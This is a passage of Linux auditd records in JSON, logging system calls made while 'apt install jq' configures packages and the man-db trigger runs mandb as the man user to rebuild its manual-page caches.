"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277163,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0006",
"inode": 277163,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.089:721",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c7f0",
"0x56016b42c820",
"0x56016b42c83a",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277176,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0007",
"inode": 277176,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.089:722",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c7f0",
"0x56016b42c820",
"0x56016b42c83a",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277182,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0008",
"inode": 277182,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.093:723",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c7f0",
"0x56016b42c820",
"0x56016b42c83a",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277184,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0009",
"inode": 277184,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.093:724",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 3,
"ppid": 7652,
"pid": 7653,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "man-db.postinst",
"exe": "/usr/bin/dash",
"key": "rootcmd",
"ARGV": [
"0x56016b437fa0",
"0x56016b42c940",
"0x56016b5e86f0",
"0x56016b428010"
]
},
"EXECVE": {
"argc": 4,
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/info/man-db.postinst",
"inode": 269346,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/bin/sh",
"inode": 787014,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
],
"launch_time": 1632470478.033,
"ppid": 7575
}
}
{
"ID": "1632470478.097:725",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "perl",
"exe": "/usr/bin/perl",
"key": "rootcmd",
"ARGV": [
"0x55c95877be88",
"0x55c95877bd78",
"0x55c95877bda8",
"0x7f6b356c3850"
]
},
"EXECVE": {
"argc": 5,
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/perl",
"inode": 787298,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.097:726",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 257,
"success": "yes",
"exit": 3,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "perl",
"exe": "/usr/bin/perl",
"key": "etcpasswd",
"ARGV": [
"0xffffff9c",
"0x7fa9b93021a1",
"0x80000",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/etc/shadow",
"inode": 133340,
"dev": "fd:00",
"mode": "0o100640",
"ouid": 0,
"ogid": 42,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.113:727",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 257,
"success": "no",
"exit": "-13",
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "file_access",
"ARGV": [
"0xffffff9c",
"0x55cf8f8a4520",
"0x0",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/root/.manpath",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.113:728",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f8a52f0",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/CACHEDIR.TAG",
"inode": 267551,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.113:729",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f8a8630",
"0x1a4",
"0x55cf8f8a3ba0",
"0x55cf8f8aa6a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/7654",
"inode": 277191,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.417:730",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 5,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f8a8630",
"0x55cf8f8a4500",
"0x0",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/",
"inode": 266926,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/",
"inode": 266926,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/cache/man/7654",
"inode": 277191,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/cache/man/index.db",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 4,
"name": "/var/cache/man/index.db",
"inode": 277191,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.417:731",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f8a4500",
"0x1a4",
"0x0",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/index.db",
"inode": 277191,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.417:732",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9b0b70",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/de/CACHEDIR.TAG",
"inode": 267552,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.417:733",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9a6dc0",
"0x1a4",
"0x55cf8f9b9560",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/de/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.421:734",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f9a6dc0",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/de"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/de/",
"inode": 266941,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/de/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.421:735",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9b0b70",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/de"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/sv/CACHEDIR.TAG",
"inode": 276950,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.421:736",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9a6dc0",
"0x1a4",
"0x55cf8f8a76d0",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/de"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/sv/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.421:737",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f9a6dc0",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/sv"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/sv/",
"inode": 266957,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/sv/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.425:738",
"SYSCALL": {
